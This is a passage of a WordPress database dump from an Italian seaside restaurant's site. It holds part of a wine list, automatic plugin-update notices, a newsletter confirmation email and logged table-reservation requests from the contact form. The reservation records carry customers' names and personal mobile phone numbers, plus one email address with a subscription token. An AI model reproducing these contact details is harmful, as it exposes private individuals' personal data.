morro)                 € 16,00\r\n\r\nMarotti Campi             Rosè Fermo (da uve lacrima di morro)             € 13,00\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Sicilia……..……………………………………………………………………..….</u></strong>\r\n\r\n&nbsp;\r\n\r\nMurgo                            Brut Rosè Metodo Classico                                      € 25,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Francia…………………………………………………………………………….</u></strong>\r\n\r\n<u>     </u>\r\n\r\nChateau Les Valentines   Cotes de provence rosé ( fermo )                 € 23,00\r\n\r\n&nbsp;\r\n\r\nPascal Doquet         Champagne brut rosé 1°ers cru                                                         € 62,00\r\n\r\n&nbsp;\r\n\r\nLamiable                  Grand cru rosé                                               (NO)    € 47,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier       Cuvée Rosé Tours Sur Marne                              € 70,00','Vini Rosati','','inherit','closed','closed','','1009-revision-v1','','','2020-06-10 15:38:49','2020-06-10 13:38:49','',1009,'https://www.ristorantesolymar.it/2020/06/10/1009-revision-v1/',0,'revision','',0),(4649,0,'2021-03-29 16:45:11','2021-03-29 14:45:11','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.78 a 3.79)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-35','','','2021-03-29 16:45:11','2021-03-29 14:45:11','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-35/',0,'postman_sent_mail','',0),(4650,0,'2021-04-02 02:44:47','2021-04-02 00:44:47','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.50 a 1.16.51)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-36','','','2021-04-02 02:44:47','2021-04-02 00:44:47','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-36/',0,'postman_sent_mail','',0),(4651,0,'2021-04-04 04:34:46','2021-04-04 02:34:46','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- UpdraftPlus - Backup/Ripristino (da versione 1.16.51 a 1.16.53)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-37','','','2021-04-04 04:34:46','2021-04-04 02:34:46','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-37/',0,'postman_sent_mail','',0),(4652,0,'2021-04-06 03:45:26','2021-04-06 01:45:26','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Mailjet for WordPress (da versione 5.2.5 a 5.2.6)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-38','','','2021-04-06 03:45:26','2021-04-06 01:45:26','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-38/',0,'postman_sent_mail','',0),(4653,0,'2021-04-06 14:48:23','2021-04-06 12:48:23','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.79 a 3.81)\n- Yoast SEO (da versione 16.0.2 a 16.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-39','','','2021-04-06 14:48:23','2021-04-06 12:48:23','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-39/',0,'postman_sent_mail','',0),(4654,0,'2021-04-07 02:34:50','2021-04-07 00:34:50','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.2 a 2.4.3)\n- Yoast SEO (da versione 16.1 a 16.1.1)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-40','','','2021-04-07 02:34:50','2021-04-07 00:34:50','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-40/',0,'postman_sent_mail','',0),(4655,0,'2021-04-08 16:28:47','2021-04-08 14:28:47','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.81 a 3.82)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-41','','','2021-04-08 16:28:47','2021-04-08 14:28:47','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-41/',0,'postman_sent_mail','',0),(4656,0,'2021-04-12 16:31:42','2021-04-12 14:31:42','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy (da versione 2.4.3 a 2.5.0)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-42','','','2021-04-12 16:31:42','2021-04-12 14:31:42','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-42/',0,'postman_sent_mail','',0),(4657,0,'2021-04-15 18:41:25','2021-04-15 16:41:25','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- WP Fastest Cache (da versione 0.9.1.6 a 0.9.1.7)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-43','','','2021-04-15 18:41:25','2021-04-15 16:41:25','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-43/',0,'postman_sent_mail','',0),(4658,0,'2021-04-16 04:34:22','2021-04-16 02:34:22','Ciao! Il tuo sito su https://www.ristorantesolymar.it/vecchio è stato aggiornato automaticamente a WordPress 5.6.3.\n\nPer altre informazioni sulla versione 5.6.3 vedi la schermata Informazioni su WordPress:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/about.php\n\n&Egrave; ora disponibile WordPress 5.7.1 L\'aggiornamento è semplice e richiede poco tempo:\nhttps://www.ristorantesolymar.it/vecchio/wp-admin/update-core.php\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nMantenere il tuo sito aggiornato è importante per la sicurezza. Rende inoltre Internet un posto più sicuro per te e i tuoi lettori.\n\nIl team di WordPress\n','[Sol Y Mar] Il tuo sito è aggiornato a WordPress 5.6.3','','private','closed','closed','','sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-3','','','2021-04-16 04:34:22','2021-04-16 02:34:22','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-il-tuo-sito-e-aggiornato-a-wordpress-5-6-3/',0,'postman_sent_mail','',0),(4659,0,'2021-04-16 14:36:42','2021-04-16 12:36:42','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Popup Builder (da versione 3.82 a 3.83)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-44','','','2021-04-16 14:36:42','2021-04-16 12:36:42','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-44/',0,'postman_sent_mail','',0),(4660,0,'2021-04-20 03:17:08','2021-04-20 01:17:08','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it/vecchio sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Really Simple SSL (da versione 4.0.13 a 4.0.14)\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-45','','','2021-04-20 03:17:08','2021-04-20 01:17:08','',0,'https://www.ristorantesolymar.it/vecchio/postman_sent_mail/sol-y-mar-alcuni-plugin-sono-stati-aggiornati-automaticamente-45/',0,'postman_sent_mail','',0),(1025,0,'2020-06-22 18:15:36','2020-06-22 16:15:36','Da: Paolo Barchi \nTelefono: 3356113164\nOggetto: Richiesta prenotazione\n\nCorpo del messaggio:\nBuonasera, son un vostro affezionato e ultraventennale Cliente!\r\nMi farebbe molto piacere cenare presso di voi sabato sera, insieme a mia Moglie e mia Figlia.\r\nE’ possibile riservare un tavolo?\r\nVi ringrazio per la cortesia.\r\nSaluti.\r\nPaolo\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-richiesta-prenotazione-2','','','2020-06-22 18:15:36','2020-06-22 16:15:36','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-prenotazione-2/',0,'postman_sent_mail','',0),(1026,0,'2020-06-24 17:59:59','2020-06-24 15:59:59','Da: Alessia \nTelefono: 3404222305\nOggetto: Prenotazione tavoli per 2\n\nCorpo del messaggio:\nSalve vorrei prenotare un tavolo per sabato 27 giugno la sera per le 20/20.30 o 21\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavoli per 2\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavoli-per-2','','','2020-06-24 17:59:59','2020-06-24 15:59:59','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavoli-per-2/',0,'postman_sent_mail','',0),(1027,0,'2020-06-25 13:13:18','2020-06-25 11:13:18','Da: Olmi \nTelefono: 3342711824\nOggetto: Info\n\nCorpo del messaggio:\nSalve vorrei prenotare per Sabato 27 giugno di sera per due persone. Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Info\"','','private','closed','closed','','da-sito-sol-y-mar-info','','','2020-06-25 13:13:18','2020-06-25 11:13:18','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-info/',0,'postman_sent_mail','',0),(1028,0,'2020-06-25 13:29:44','2020-06-25 11:29:44','Da: Fabio \nTelefono: 3391147450\nOggetto: Prenotazione ristorante Dove posti per la cena del 25 giugno 2020 giovedì\n\nCorpo del messaggio:\nStiamo cercando di contattarvi al telefono per prenotare due posti per la cena di questa sera giovedì 25 giugno 2020. Nessuno risponde. Come possibile farlo? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione ristorante Dove posti per la cena del 25 giugno 2020 giovedì\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-ristorante-dove-posti-per-la-cena-del-25-giugno-2020-giovedi','','','2020-06-25 13:29:44','2020-06-25 11:29:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-ristorante-dove-posti-per-la-cena-del-25-giugno-2020-giovedi/',0,'postman_sent_mail','',0),(1029,0,'2020-06-25 21:02:32','2020-06-25 19:02:32','Da: Andrea \nTelefono: 3426741422\nOggetto: Richiesta prenotazione per 2 27 giugno\n\nCorpo del messaggio:\nBuonasera chiedo disponibilità per 2 persone sabato 27 giugno cena intorno alle 2030.\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta prenotazione per 2 27 giugno\"','','private','closed','closed','','da-sito-sol-y-mar-richiesta-prenotazione-per-2-27-giugno','','','2020-06-25 21:02:32','2020-06-25 19:02:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-prenotazione-per-2-27-giugno/',0,'postman_sent_mail','',0),(1030,0,'2020-06-26 16:01:32','2020-06-26 14:01:32','Da: Gianluca Magro \nTelefono: 3356814182\nOggetto: Info per prenotazione\n\nCorpo del messaggio:\nBuonasera mi chiamo Gianluca Magro e vi scrivo da Brescia. Vorrei sapere se siete aperti e se sì  se sia possibile prenotare un tavolo per due persone a cena questa domenica, 28 giugno. Orario 20.45. Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Info per prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-info-per-prenotazione','','','2020-06-26 16:01:32','2020-06-26 14:01:32','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-info-per-prenotazione/',0,'postman_sent_mail','',0),(1031,0,'2020-06-26 16:22:33','2020-06-26 14:22:33','Da: Rita Sberlati \nTelefono: 3356114173\nOggetto: Prenotzzione\n\nCorpo del messaggio:\nBuongiorno possibile prenotare per questa sera 26 giugno per 3 persone in esterno ? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotzzione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotzzione','','','2020-06-26 16:22:33','2020-06-26 14:22:33','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotzzione/',0,'postman_sent_mail','',0);
INSERT INTO `wp_posts` VALUES (1032,0,'2020-06-26 22:10:12','2020-06-26 20:10:12','\n\n    \n        <title>Per favore conferma la tua iscrizione</title>\n        <!--[if !mso]&gt; -->\n        \n            &lt;!--\n            \n                \n                    \n                        #outlook a { padding: 0; }\n                        .ReadMsgBody { width: 100%; }\n                        .ExternalClass { width: 100%; }\n                        .ExternalClass * { line-height:100%; }\n                        body { margin: 0; padding: 0; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; }\n                        table, td { border-collapse:collapse; mso-table-lspace: 0pt; mso-table-rspace: 0pt; }\n                        img { border: 0; height: auto; line-height: 100%; outline: none; text-decoration: none; -ms-interpolation-mode: bicubic; }\n                        p { display: block; margin: 13px 0; }\n                    \n                    <!--[if !mso]&gt;&gt;-->\n                    \n                        @media only screen and (max-width:480px) {\n                            @-ms-viewport { width:320px; }\n                            @viewport { width:320px; }\n                        }\n                    \n                    &lt;!--\n                    <!--[if mso]&gt;-->\n                    \n                      \n                        \n                        96\n                      \n                    \n                    \n                    <!--[if lte mso 11]&gt;-->\n                    \n                      .outlook-group-fix {\n                        width:100% !important;\n                      }\n                    \n                    \n                    \n                        @media only screen and (min-width:480px) {\n                            .mj-column-per-100 { width:100%!important; }\n                        }\n                    \n                    \n                    \n\n                        <div class=\"mj-container\" style=\"background-color:#F4F4F4\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px;padding-bottom:0px;padding-top:0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"font-size:0px\"><div style=\"font-size:1px;line-height:40px\"> </div></td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            \n                            <!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px;background:#ffffff\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%;background:#ffffff\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\">\n                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\">\n                                                        <tbody>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:20px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <h1 style=\"font-family: \'Trebuchet MS\', Helvetica, Arial, sans-serif;font-size: 28px;font-weight: normal;line-height: 32px\"><b><span style=\"font-family:Arial,sans-serif\">Per favore conferma la tua iscrizione</span></b></h1>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <p style=\"font-size: 15px;margin: 10px 0\">\n                                                                            Per ricevere le newsletter a partire da <a href=\"https://www.ristorantesolymar.it\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.ristorantesolymar.it</a>, conferma la tua iscrizione cliccando sul seguente pulsante:\n                                                                            &lt;!--                                                        To receive newsletters from: \n                                                                                                                                    <a target=\"_blank\" rel=\"noopener noreferrer\">https://www.ristorantesolymar.it</a>\" style=\"color: #00a6f9; text-decoration: underline; text-decoration: none;\"&gt;\n                                                                                                                                        <span style=\"color:#00a6f9\"><a href=\"https://www.ristorantesolymar.it\" target=\"_blank\" rel=\"noopener noreferrer\">https://www.ristorantesolymar.it</a></span>\n                                                                                                                                    </a>, please confirm your subscription by clicking the following button. --&gt;\n                                                                        </p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px\" align=\"left\">\n                                                                    <table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"border-collapse:separate\" align=\"left\" border=\"0\">\n                                                                        <tbody>\n                                                                            <tr>\n                                                                                <td style=\"border:none;border-radius:3px;color:#ffffff;cursor:auto;padding:10px 25px\" align=\"center\" valign=\"middle\" bgcolor=\"#00a6f9\">\n                                                                                    <a href=\"https://www.ristorantesolymar.it?subscribe=1&amp;user_email=VaniJolla@belan.website&amp;mj_sub_comment_author_token=189be5c06accc9506c122923c033dff0913718ee\" style=\"text-decoration:none;background:#00a6f9;color:#ffffff;font-family:Arial, sans-serif;font-size:16px;font-weight:normal;line-height:120%;text-transform:none;margin:0px\"><b>Sì, voglio iscrivermi a questa lista</b></a>\n                                                                                </td>\n                                                                            </tr>\n                                                                        </tbody>\n                                                                    </table>\n                                                                </td>\n                                                            </tr>\n                                                            <tr>\n                                                                <td style=\"font-size:0px;padding:10px 25px;padding-top:0px;padding-bottom:0px\" align=\"left\">\n                                                                    <div style=\"cursor:auto;color:#5e6977;font-family:Arial, sans-serif;font-size:13px;line-height:22px;text-align:left\">\n                                                                        <p style=\"font-size: 15px;margin: 10px 0\">Se hai ricevuto questa e-mail per errore o non vuoi più iscriverti, semplicemente ignora questo messaggio.</p>\n                                                                    </div>\n                                                                </td>\n                                                            </tr>\n                                                        </tbody>\n                                                    </table>\n                                                </div><!--[if mso | IE]&gt;-->\n                        </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            \n                            <!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" align=\"center\" style=\"width:600px\">\n                              <tr>\n                                <td style=\"line-height:0px;font-size:0px\">\n                            <div style=\"margin:0px auto;max-width:600px\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" style=\"font-size:0px;width:100%\" align=\"center\" border=\"0\"><tbody><tr><td style=\"text-align:center;vertical-align:top;direction:ltr;font-size:0px;padding:20px 0px 20px 0px\"><!--[if mso | IE]&gt;-->\n                            <table role=\"presentation\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\n                              <tr>\n                                <td style=\"vertical-align:top;width:600px\">\n                            <div class=\"mj-column-per-100 outlook-group-fix\" style=\"vertical-align:top;direction:ltr;font-size:13px;text-align:left;width:100%\"><table role=\"presentation\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" border=\"0\"><tbody><tr><td style=\"font-size:0px\"><div style=\"font-size:1px;line-height:40px\"> </div></td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </td></tr></tbody></table></div><!--[if mso | IE]&gt;-->\n                            </td></tr></table>\n                            </div>\n                    \n                    ','Conferma d\'iscrizione','','private','closed','closed','','conferma-discrizione-6','','','2020-06-26 22:10:12','2020-06-26 20:10:12','',0,'https://www.ristorantesolymar.it/postman_sent_mail/conferma-discrizione-6/',0,'postman_sent_mail','',0),(1033,0,'2020-06-29 16:34:30','2020-06-29 14:34:30','Da: Giovanni \nTelefono: 3384456645\nOggetto: Sabato4\n\nCorpo del messaggio:\nSalve avete possibilità di cena con bella vista mare ? Per sabato sera 4/7 avreste eventualmente due posti? Fate solo pesce? Grazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Sabato4\"','','private','closed','closed','','da-sito-sol-y-mar-sabato4','','','2020-06-29 16:34:30','2020-06-29 14:34:30','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-sabato4/',0,'postman_sent_mail','',0),(1034,0,'2020-06-29 17:37:37','2020-06-29 15:37:37','Da: Viviana \nTelefono: 3351230864\nOggetto: PRENOTAZIONE TAVOLO\n\nCorpo del messaggio:\nBuongiorno, vorrei prenotare un tavolo per sabato 18 luglio a pranzo, siamo in 5. Arriveremmo verso le ore 12,30.\r\nGrazie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"PRENOTAZIONE TAVOLO\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-2','','','2020-06-29 17:37:37','2020-06-29 15:37:37','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-2/',0,'postman_sent_mail','',0),(1035,0,'2020-07-01 12:20:07','2020-07-01 10:20:07','Da: Angelo \nTelefono: 3339022559\nOggetto: prenotazione\n\nCorpo del messaggio:\nSalve, è possibile riservare un tavolo per 6 persone per venerdi 10 luglio ore 21: ?\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"prenotazione\"','','private','closed','closed','','da-sito-sol-y-mar-prenotazione-3','','','2020-07-01 12:20:07','2020-07-01 10:20:07','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-3/',0,'postman_sent_mail','',0),(1036,0,'2020-07-04 15:31:56','2020-07-04 13:31:56','Da: Giulia \nTelefono: 3515581540\nOggetto: Prenotazione tavolo\n\nCorpo del messaggio:\nBuonasera vorrei un tavolo stasera per le 21, a nome Spina.. un tavolo “romantico” fuori :) attendo una vostra conferma grazie mille\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione tavolo\"','Invalid \"Reply-To\" e-mail address \"giulia.bacch@gmail.con\"','private','closed','closed','','da-sito-sol-y-mar-prenotazione-tavolo-3','','','2020-07-04 15:31:56','2020-07-04 13:31:56','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-tavolo-3/',0,'postman_sent_mail','',0),(1037,0,'2020-07-04 